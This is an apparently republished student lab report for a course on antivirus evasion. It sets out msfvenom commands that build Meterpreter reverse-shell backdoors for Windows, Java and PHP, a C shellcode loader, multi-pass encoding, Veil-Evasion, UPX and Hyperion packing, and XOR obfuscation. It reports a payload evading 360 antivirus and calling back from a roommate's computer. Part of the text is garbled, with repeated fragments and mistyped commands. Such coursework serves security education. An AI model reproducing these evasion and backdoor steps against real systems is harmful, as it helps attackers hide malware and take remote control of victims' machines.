2018-2019-2 網絡對抗技術 20165239 Exp3 免殺原理與實踐
win10 ip位址 192.168.18.1
fenix ip位址為 192.168.18.128
(1)殺軟是如何檢測出惡意代碼的?
•根據計算機病毒課程知道了每個病毒都有其對應的特征碼,殺軟是根據這些特征碼來判定他是不是病毒。
•根據該軟體的行為進行檢測如有異常行為,會被判定為風險檔案或病毒。
•基于行為的惡意軟體檢測:在啟發式基礎上對軟體行為進行監控
(2)免殺是做什麼?
通過一定的技術手段,将惡意軟體處理,使之不會被防毒軟體發現。
(3)免殺的基本方法有哪些?
•改變特征碼:對于.exe檔案可以加殼,對于shellcode可以進行加密然後利用shellcode生成可執行檔案,或者用其他語言進行重寫再編譯
•改變行為:根據改變通訊模式、操作模式來實作免殺。
- 實踐内容
任務一: 正确使用msf編碼器(0.5分),msfvenom生成如jar之類的其他檔案(0.5分),veil-evasion(0.5分),加殼工具(0.5分),使用shellcode程式設計(1分)
1.使用VirusTotal或Virscan這兩個網站對實驗二生成的後門程式進行掃描。
•VirusTotal掃描後結果如下:
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiIn5GcuITM3ITN4kDN40CNxgzMzkDMzETMzMDM5EDMy0SOwcjN5ITMvw1MwkTMwIzLclDM3YTOyEzLcd2bsJ2Lc12bj5ycn9Gbi52YugTMwIzZtl2Lc9CX6MHc0RHaiojIsJye.png)
2.用msf編碼器對後門程式進行一次到多次的編碼,并進行檢測
•一次編碼使用指令:
•VirusTotal掃描後結果如下:
•十次編碼使用指令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded10.exe
•VirusTotal掃描後結果如下:
3.msfvenom生成jar檔案、php檔案
•生成java後門程式使用指令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 x> 5239_backdoor_java.jar
•VirusTotal掃描後結果如下:
•生成php後門程式使用指令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.18.128LPORT=5239 x> 5239_backdoor.php
•VirusTotal掃描後結果如下:
4.使用veil-evasion生成後門程式及檢測
•安裝veil
代碼
:sudo apt-get install veil
•安好後use evasion指令進入Evil-Evasion
•設定反彈連接配接IP,set LHOST 192.168.18.128,IP是KaliIP;設定端口set LPORT 5239指令use c/meterpreter/rev_tcp.py進入配置界面
•設定反彈連接配接IP,set LHOST 192.168.18.128,IP是KaliIP;設定端口set LPORT 5239
•指令generate生成檔案,輸入playload的名字:veil_c_5239
•VirusTotal掃描後結果如下
5.手工注入Shellcode并執行
•使用指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239-f c用c語言生成一段shellcode;
•vim 20165239.c,然後将unsigned char buf[]指派到其中
unsigned char buf[] =
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 -f c生成的代碼 加
int main()
{
int (func)() = (int()())buf;
func();
}
•使用指令:i686-w64-mingw32-g++ 20165239.c -o 20165239.exe編譯這個.c檔案為可執行檔案;
•VirusTotal掃描後結果如下
6.加殼嘗試
•加壓縮殼upx 20165239.exe -o 20165239_uped.exe
•VirusTotal掃描後結果如下:
•加密殼Hyperion:進入目錄/usr/share/windows-binaries/hyperion/中将20165239_uped.exe拷貝進來并用wine hyperion.exe -v 20165239_upxed.exe 20165239_upxed_Hyperion.exe進行加殼
•VirusTotal掃描後結果如下:
任務二:通過組合應用各種技術實作惡意代碼免殺(0.5分)
•用codeblocks的C語言将前面的.c檔案裡的shellcode加密(加密方式為加五在異或0x66)得到下圖的shellcode,然後在進行加壓縮殼。
•實作免殺效果,并回連成功 防毒軟體為360安全衛士
的C語言将前面的.c檔案裡的shellcode加密(加密方式為加五在異或0x66)得到下圖的shellcode,然後在進行加壓縮殼
任務二:通過組合應用各種技術實作惡意代碼免殺(0.5分)
•用codeblocks的C語言将前面的.c檔案裡的shellcode加密(加密方式為加五在異或0x66)得到下圖的shellcode,然後在進行加壓縮殼
任務三:用另一電腦實測,在殺軟開啟的情況下,可運作并回連成功,注明電腦的殺軟名稱與版本(加分0.5)
•對舍友電腦進行免殺效果測試并回連成功(舍友的殺軟為最新的360安全衛士11)
實驗感想:
本次實驗大多數是我一個人完成的,有些不會則問舍友同學,在安裝kali過程中很多都是問舍友,還有查閱網上的資料
轉載于:https://www.cnblogs.com/qm20165239/p/10631041.html